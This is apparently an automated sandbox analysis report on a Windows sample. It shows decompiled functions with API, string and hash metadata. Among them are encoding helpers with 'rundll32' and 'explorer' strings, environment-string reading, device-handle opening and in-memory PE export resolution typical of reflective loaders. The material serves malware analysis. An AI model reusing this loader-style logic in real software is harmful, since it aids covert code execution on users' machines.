				_t118 = _a4;
				_v12 = E1000CAD0(_t118);
				_v296 = 0;
				_t70 = _v12 & 0x80000007;
				if(_t70 < 0) {
					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
				}
				if(_t70 == 0) {
					_t120 = _v12 + 8;
					__eflags = _t120;
					_v296 = _t120;
				} else {
					asm("cdq");
					_t120 = _t118 & 0x00000007;
					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
				}
				_v8 = L1000CEAF(_t101, _t120, _t131, _t132, _v296);
				E1000CF80(_t131, _v8, 0, _v296);
				E1000D1F0(_t101, _t131, _t132, _v8, _a4, E1000CAD0(_a4));
				E1001F110(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
				asm("cdq");
				_v312 = L1000CEAF(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
				asm("cdq");
				E1000CF80(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
				_t90 = _v296 + 2;
				asm("cdq");
				E1001F2A0(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
				_push(_v8);
				E1000CA40(_t101, _t131, _t132, _t90 % 3);
				return _v312;
			}

0x10022530
0x10022530
0x10022530
0x10022539
0x1002253e
0x10022541
0x10022547
0x1002254a
0x10022550
0x10022553
0x10022558
0x1002255e
0x10022564
0x1002256a
0x10022570
0x10022584
0x10022597
0x100225ac
0x100225b4
0x100225c0
0x100225c3
0x100225d0
0x100225d5
0x100225db
0x100225db
0x100225de
0x100225fe
0x100225fe
0x10022601
0x100225e0
0x100225e3
0x100225e4
0x100225f3
0x100225f3
0x10022616
0x10022626
0x10022643
0x10022661
0x10022672
0x1002268a
0x10022699
0x100226b2
0x100226cb
0x100226ce
0x100226e5
0x100226f0
0x100226f1
0x10022702

APIs

_memset.LIBCMT ref: 10022584
_strlen.LIBCMT ref: 100225B8
_memset.LIBCMT ref: 10022626
_strlen.LIBCMT ref: 10022632
_memset.LIBCMT ref: 100226B2

Strings

rundll32, xrefs: 10022539
explorer, xrefs: 10022553

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlen
String ID: explorer$rundll32
API String ID: 1975251954-2912785976
Opcode ID: 9443fa5ab6797b87b178558609728bb1873431855db9e7741aa6f05c907c90f5
Instruction ID: dabab85bc6ef052ed749d04d1e93e2dad56e743369109b7e858dc002110f0523
Opcode Fuzzy Hash: 9443fa5ab6797b87b178558609728bb1873431855db9e7741aa6f05c907c90f5
Instruction Fuzzy Hash: 9A516DBAD00218ABDB14DB98DC92FDE73B9EB4C304F044199E54997341EA31FB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004010E0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004010E0() {
				intOrPtr _v0;
				short _v28;
				short _v32;
				char _v61;
				char _v62;
				char _v63;
				struct tagLOGFONTA _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				short _v70;
				short _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagLOGBRUSH _v100;
				short _t49;
				struct HFONT__* _t50;
				intOrPtr _t51;
				intOrPtr* _t57;
				signed int _t58;
				signed char _t61;
				short _t67;
				short _t68;
				intOrPtr _t82;

				memset( &(_v64.lfWidth), 0, 0xf << 2);
				_t49 =  *"Arial"; // 0x61697241
				_t67 =  *0x40d1cc; // 0x6c
				_v72 = 0xe6cc;
				_v70 = 0x48c6;
				_v68 = 0x9a;
				_v67 = 0x35;
				_v66 = 0xc0;
				_v65 = 0xf9;
				_v64.lfHeight = 7;
				_v63 = 0xe5;
				_v62 = 0xda;
				_v61 = 0xb9;
				_v64.lfWidth.lfHeight = 0x10;
				_v64.lfItalic = 0x190;
				_v32 = _t49;
				_v28 = _t67;
				_t50 = CreateFontIndirectA( &(_v64.lfWidth));
				_t82 = _v0;
				_v64.lfHeight = 0x10;
				 *(_t82 + 0x18) = _t50;
				_t51 =  *((intOrPtr*)("Arial")); // 0x61697241
				_t68 =  *0x40d1cc; // 0x6c
				_v64.lfWeight = 0x320;
				_v64.lfFaceName = _t51;
				_v32 = _t68;
				 *((intOrPtr*)(_t82 + 0x1c)) = CreateFontIndirectA( &_v64);
				_v100.lbColor.lbStyle = 0;
				_v100.lbHatch = 0xffffff;
				 *((intOrPtr*)(_t82 + 0x20)) = CreateBrushIndirect( &(_v100.lbColor));
				_v100.lbStyle = 0;
				_v100.lbColor.lbStyle = 0xc8c8c8;
				 *((intOrPtr*)(_t82 + 0x24)) = CreateBrushIndirect( &_v100);
				 *((intOrPtr*)(_t82 + 0xc)) = LoadBitmapA( *(_t82 + 4), 0x65);
				_t57 =  &_v88 + 0xc - 0x10;
				 *_t57 = 0xd657ec7b;
				 *((intOrPtr*)(_t57 + 4)) = _v88;
				 *((intOrPtr*)(_t57 + 8)) = _v84;
				 *((intOrPtr*)(_t57 + 0xc)) = _v80;
				_t58 = E00403570();
				 *(_t82 + 0x2c) = _t58;
				if(_t58 != 0) {
					 *((intOrPtr*)(_t82 + 0x30)) = E00403660(_t58);
					_t61 = E004036A0( *(_t82 + 0x2c), _t82 + 0x34);
					asm("sbb eax, eax");
					return _t61 & 0x000000fe;
				} else {
					return _t58 | 0xffffffff;
				}
			}

0x004010f1
0x004010f3
0x004010f8
0x0040110f
0x00401116
0x0040111d
0x00401122
0x00401127
0x0040112c
0x00401131
0x00401136
0x0040113b
0x00401140
0x00401145
0x0040114d
0x00401155
0x00401159
0x0040115e
0x00401160
0x00401169
0x00401171
0x00401174
0x00401179
0x00401180
0x00401188
0x0040118c
0x00401199
0x004011a0
0x004011a9
0x004011b7
0x004011bb
0x004011c3
0x004011d3
0x004011e3
0x004011ea
0x004011ec
0x004011ee
0x004011f5
0x004011f8
0x004011fb
0x00401203
0x00401208
0x0040121a
0x00401225
0x00401236
0x00401240
0x0040120a
0x00401213
0x00401213

APIs

CreateFontIndirectA.GDI32 ref: 0040115E
CreateFontIndirectA.GDI32(00000007), ref: 00401191
CreateBrushIndirect.GDI32(?), ref: 004011B1
CreateBrushIndirect.GDI32(00000000), ref: 004011CB
LoadBitmapA.USER32 ref: 004011D6

Part of subcall function 00403570: GetTickCount.KERNEL32 ref: 00403577
Part of subcall function 00403570: SetupDiGetClassDevsA.SETUPAPI(?,00000000,00000000,00000012), ref: 00403593

Strings

Arial, xrefs: 004010F3, 00401174
5, xrefs: 00401122

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateIndirect$BrushFont$BitmapClassCountDevsLoadSetupTick
String ID: 5$Arial
API String ID: 1147224935-541822079
Opcode ID: d60dfe3b84b4a58d9a5d83f059e2646c64ce9c7cc266f314e3cdc9e552848854
Instruction ID: b55f597ceb39f0a81ff7d757ff3f92b208840d329d66038bf8bb08e1a96f4faf
Opcode Fuzzy Hash: d60dfe3b84b4a58d9a5d83f059e2646c64ce9c7cc266f314e3cdc9e552848854
Instruction Fuzzy Hash: 8A4149705087419FC310DF29C944A4BBBE4EF89328F008E2DE499A73A1E775E5098B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040686B, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040686B() {
				int _v4;
				int _v8;
				void* __ecx;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				void* _t33;
				void* _t35;
				CHAR* _t37;
				WCHAR* _t39;
				void* _t40;
				int _t43;

				_t7 =  *0x410980; // 0x0
				_t32 = 0;
				_t39 = 0;
				_t37 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t37 != _t32) {
							L20:
							_t9 = _t37;
							if( *_t37 == _t32) {
								L23:
								_t42 = _t9 - _t37 + 1;
								_t40 = E00403A89(_t33, _t9 - _t37 + 1);
								if(_t40 != _t32) {
									E00405F40(_t40, _t37, _t42);
								} else {
									_t40 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t40;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t37 = GetEnvironmentStrings();
						if(_t37 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t39 != _t32) {
						L8:
						_t17 = _t39;
						if( *_t39 == _t32) {
							L11:
							_t20 = (_t17 - _t39 >> 1) + 1;
							_v4 = _t20;
							_t43 = WideCharToMultiByte(_t32, _t32, _t39, _t20, _t32, _t32, _t32, _t32);
							if(_t43 != _t32) {
								_t24 = E00403A89(_t33, _t43);
								_pop(_t35);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t39, _v4, _t24, _t43, _t32, _t32) == 0) {
										E004039A0(_t35, _v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t39);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t39 = GetEnvironmentStringsW();
					if(_t39 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t39 = GetEnvironmentStringsW();
				if(_t39 == 0) {
					_t37 = GetEnvironmentStrings();
					if(_t37 == 0) {
						goto L27;
					}
					 *0x410980 = 2;
					goto L18;
				}
				 *0x410980 = 1;
				goto L6;
			}

0x0040686d
0x0040687c
0x0040687e
0x00406880
0x00406884
0x004068bc
0x00406946
0x00406994
0x00000000
0x00406994
0x00406948
0x0040694a
0x00406958
0x0040695a
0x0040695c
0x00406968
0x0040696b
0x00406973
0x00406978
0x00406981
0x0040697a
0x0040697a
0x0040697a
0x0040698a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040695e
0x0040695e
0x0040695e
0x0040695e
0x0040695f
0x00406963
0x00406964
0x00000000
0x0040695e
0x00406952
0x00406956
0x00000000
0x00000000
0x00000000
0x00406956
0x004068c2
0x004068c4
0x004068d2
0x004068d5
0x004068d7
0x004068e7
0x004068f3
0x004068fa
0x00406900
0x00406904
0x00406907
0x0040690e
0x0040690f
0x00406913
0x00406924
0x0040692a
0x00406930
0x00406930
0x00406934
0x00406934
0x00406913
0x00406939
0x00000000
0x00000000
0x00000000
0x00000000
0x004068d9
0x004068d9
0x004068d9
0x004068da
0x004068db
0x004068e1
0x004068e2
0x00000000
0x004068d9
0x004068c8
0x004068cc
0x00000000
0x00000000
0x00000000
0x004068cc
0x00406888
0x0040688c
0x004068a0
0x004068a4
0x00000000
0x00000000
0x004068aa
0x00000000
0x004068aa
0x0040688e
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00406886
GetEnvironmentStrings.KERNEL32 ref: 0040689A
GetEnvironmentStringsW.KERNEL32 ref: 004068C6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004068FE
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00406920
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00406939
GetEnvironmentStrings.KERNEL32 ref: 0040694C
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040698A

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 0bb65d594f62f6885c00aa8fbd76a4a1f59a4db6248cbbad0ac2eaacf3105260
Instruction ID: cb2d569cf86d10741901bdab4dcf8e60e262cd169569d6f018d01fb75fa15f46
Opcode Fuzzy Hash: 0bb65d594f62f6885c00aa8fbd76a4a1f59a4db6248cbbad0ac2eaacf3105260
Instruction Fuzzy Hash: E731F0F35052252EEB203FB85C8483BBADCE645758B16053FF583F3280E6399C6186AD

Uniqueness

Uniqueness Score: -1.00%

Function 00403570, Relevance: 10.6, APIs: 7, Instructions: 83
fileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00403570(char _a4) {
				char _v12;
				char _v44;
				char _v64;
				char _v72;
				char _v88;
				char _v92;
				intOrPtr _v96;
				signed int _t12;
				char* _t15;
				void* _t26;
				intOrPtr* _t27;
				char* _t34;
				void* _t35;
				intOrPtr* _t37;

				_t26 = 0;
				_t12 = GetTickCount();
				 *0x40d5e4 = _t12 *  *0x40d5e4 + 1;
				_t15 =  &_a4;
				__imp__SetupDiGetClassDevsA(_t15, 0, 0, 0x12);
				_t34 = _t15;
				if(_t34 != 0xffffffff) {
					_v44 = 0x1c;
					__imp__SetupDiEnumDeviceInterfaces(_t34, 0,  &_v12, 0,  &_v44, _t35);
					if(_t15 != 0) {
						_t27 = __imp__SetupDiGetDeviceInterfaceDetailA;
						 *_t27(_t34,  &_v64, 0, 0,  &_v72, 0);
						_t37 = E00403A89( &_v64, _v96);
						 *_t37 = 5;
						_t30 = _v96;
						 *_t27(_t34,  &_v88, _t37, _v96,  &_v92, 0);
						_t11 = _t37 + 4; // 0x4
						_t26 = CreateFileA(_t11, 0xc0000000, 1, 0, 3, 0x800, 0);
						if(_t37 != 0) {
							E004039A0(_t30, _t37);
						}
					}
					__imp__SetupDiDestroyDeviceInfoList(_t34);
					return _t26;
				} else {
					return 0;
				}
			}

0x00403575
0x00403577
0x00403587
0x0040358d
0x00403593
0x00403599
0x0040359e
0x004035b8
0x004035c0
0x004035c8
0x004035ca
0x004035e1
0x004035ed
0x004035fa
0x00403600
0x0040360b
0x0040361a
0x0040362b
0x0040362d
0x00403630
0x00403635
0x0040362d
0x00403639
0x00403647
0x004035a1
0x004035a7
0x004035a7

APIs

GetTickCount.KERNEL32 ref: 00403577
SetupDiGetClassDevsA.SETUPAPI(?,00000000,00000000,00000012), ref: 00403593
SetupDiEnumDeviceInterfaces.SETUPAPI ref: 004035C0
SetupDiGetDeviceInterfaceDetailA.SETUPAPI(00000000,?,00000000,00000000,00000000,00000000), ref: 004035E1
SetupDiGetDeviceInterfaceDetailA.SETUPAPI(00000000,?,00000000,?,?,00000000), ref: 0040360B
CreateFileA.KERNEL32(00000004,C0000000,00000001,00000000,00000003,00000800,00000000,?,?,?,?,?,?,?,?,00401200), ref: 00403623
SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00403639

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: Setup$Device$DetailInterface$ClassCountCreateDestroyDevsEnumFileInfoInterfacesListTick
String ID:
API String ID: 280619443-0
Opcode ID: 13ebda6fc5b1f8bf7786c58a6fd60503955d276117875a0d07b4adc201912218
Instruction ID: 2111d22678be0be0e8fa47b01a7fb7e7f4be4bb325cb1ef0c0c3e92b1a604571
Opcode Fuzzy Hash: 13ebda6fc5b1f8bf7786c58a6fd60503955d276117875a0d07b4adc201912218
Instruction Fuzzy Hash: CA2183716403007FE3109F50DD85FAB77ACEB84754F50453DFA45AA2D0E7B8E90987AA

Uniqueness

Uniqueness Score: -1.00%

Function 004090EB, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004090EB(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x40b760);
				_push(E00405E4C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x410a18; // 0x0
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x410818; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E004038A0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00407CC0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x410808; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x40b6e8, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x40b6e4, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x410a18 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x004090ee
0x004090f0
0x004090f5
0x00409100
0x00409101
0x00409108
0x0040910e
0x00409111
0x0040911a
0x0040915a
0x0040915d
0x00409186
0x00000000
0x0040918c
0x0040918f
0x00409191
0x00409196
0x00409196
0x004091a6
0x004091b0
0x004091b6
0x004091bb
0x00000000
0x004091bd
0x004091bd
0x004091ca
0x004091cf
0x004091d2
0x004091d4
0x004091da
0x004091ef
0x004091f5
0x00000000
0x004091f7
0x00409206
0x0040920e
0x00000000
0x00409210
0x00409218
0x00409218
0x0040920e
0x004091f5
0x004091bb
0x0040915f
0x0040915f
0x00409164
0x00409166
0x00409166
0x00409178
0x00409178
0x0040911c
0x0040911f
0x00409122
0x00409132
0x0040914c
0x00409220
0x00409220
0x00409152
0x00409154
0x00000000
0x00409154
0x00409134
0x00409134
0x00409155
0x00409155
0x00000000
0x00409155
0x00409132
0x00409228
0x00409233

APIs

GetStringTypeW.KERNEL32(00000001,0040B6E8,00000001,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040912A
GetStringTypeA.KERNEL32(00000000,00000001,0040B6E4,00000001,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409144
GetStringTypeA.KERNEL32(00000000,00000000,?,00000100,00000020,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409178
MultiByteToWideChar.KERNEL32(00000001,00000101,?,00000100,00000000,00000000,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 004091B0
MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000100,?,00000100,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409206
GetStringTypeW.KERNEL32(00000000,?,00000000,00000020,?,00000100,?,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409218

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 04c946430f380f41b092c234e871969b9f2bcbd970ef16b0294540a403549ed5
Instruction ID: 9475de8012dced2f5ac8a1150185371de60179b956b0b8ca1f619be50ce79b23
Opcode Fuzzy Hash: 04c946430f380f41b092c234e871969b9f2bcbd970ef16b0294540a403549ed5
Instruction Fuzzy Hash: A7415B72A4020AFFDB109F94DC89EEF7B68EB09750F10493AF911A6291C3399D518BD9

Uniqueness

Uniqueness Score: -1.00%

Function 004012C0, Relevance: 9.0, APIs: 6, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004012C0(struct HDC__* _a4, void* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				void _v36;
				int _v40;
				int _v44;
				void* _v56;
				struct HDC__* _t10;
				void* _t18;
				struct HDC__* _t23;
				struct HDC__* _t24;

				_t23 = _a4;
				_t10 = CreateCompatibleDC(_t23);
				_t18 = _a12;
				_t24 = _t10;
				_v8 = SelectObject(_t24, _t18);
				GetObjectA(_t18, 0x18,  &_v36);
				BitBlt(_t23, _v16, _v12, _v44, _v40, _t24, 0, 0, 0xcc0020);
				SelectObject(_t24, _v56);
				return DeleteDC(_t24);
			}

0x004012c7
0x004012cc
0x004012d2
0x004012dc
0x004012e2
0x004012ee
0x00401313
0x0040131f
0x0040132f

APIs

CreateCompatibleDC.GDI32(?), ref: 004012CC
SelectObject.GDI32(00000000,?), ref: 004012E0
GetObjectA.GDI32(?,00000018,?), ref: 004012EE
BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00401313
SelectObject.GDI32(00000000,?), ref: 0040131F
DeleteDC.GDI32(00000000), ref: 00401322

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$CompatibleCreateDelete
String ID:
API String ID: 2280115113-0
Opcode ID: 97d30cea3b4848ec61989ca9b3a25616bbb10135de2f2940fa573a013330b45f
Instruction ID: f2e8a14a8be1bbbb7043d571baa78ab61f6b2ffc4645eec57c6b3d27f00c4ef2
Opcode Fuzzy Hash: 97d30cea3b4848ec61989ca9b3a25616bbb10135de2f2940fa573a013330b45f
Instruction Fuzzy Hash: A7014B75205304BFD200AB14DD89E7FBBBCEBC9A61F004519FA55A2251C734AD058BBA

Uniqueness

Uniqueness Score: -1.00%

Function 0040435E, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 220COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 00404426
__aulldiv.LIBCMT ref: 00404438

Strings

9, xrefs: 0040443D
@, xrefs: 0040439F
, xrefs: 004044AD

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: $9$@
API String ID: 3839614884-2218630745
Opcode ID: e9eda9232186072c74cb026bcd12e6f5f724482616f28563be48eeb686a45e44
Instruction ID: 4870c711b13616f854490a8b219108e217baa0eade86fc1a7e1194492a6e8e37
Opcode Fuzzy Hash: e9eda9232186072c74cb026bcd12e6f5f724482616f28563be48eeb686a45e44
Instruction Fuzzy Hash: B48190B1D01249ABDF11DFA4C845BEEBBB4EF84314F14406BEA10B62C1D33D9A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 1001AF10, Relevance: 8.9, APIs: 7, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AF10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _t105;
				void* _t174;
				void* _t176;

				_t172 = __edi;
				_t122 = __ebx;
				_v16 = _a4;
				_t4 = _v16 + 4; // 0x7d83ec45
				_v24 =  *_t4;
				_v12 = 0;
				_v20 =  *_v16 + 0x78;
				if( *((intOrPtr*)(_v20 + 4)) != 0) {
					_v8 = _v24 +  *_v20;
					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							if( *(_v8 + 0x18) != 0) {
								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
									L19:
									_t70 = _v16 + 0x30; // 0x51e84d8b
									_v28 = E1000DFB8(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AAC0);
									if(_v28 != 0) {
										_v12 =  *(_v28 + 4) & 0x0000ffff;
										L22:
										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
										}
										SetLastError(0x7f);
										return 0;
									}
									SetLastError(0x7f);
									return 0;
								}
								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
								_t105 = L1000CEAF(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
								_t176 = _t174 + 4;
								_v44 = _t105;
								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
								if(_v44 != 0) {
									_v32 = 0;
									while(_v32 <  *(_v8 + 0x18)) {
										 *_v44 = _v24 +  *_v36;
										 *((short*)(_v44 + 4)) =  *_v40;
										_v32 = _v32 + 1;
										_v36 = _v36 + 4;
										_v40 = _v40 + 2;
										_v44 = _v44 + 8;
									}
									_t66 = _v16 + 0x30; // 0x51e84d8b
									E1000DA30( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AAF0);
									_t174 = _t176 + 0x10;
									goto L19;
								}
								SetLastError(0xe);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L22;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
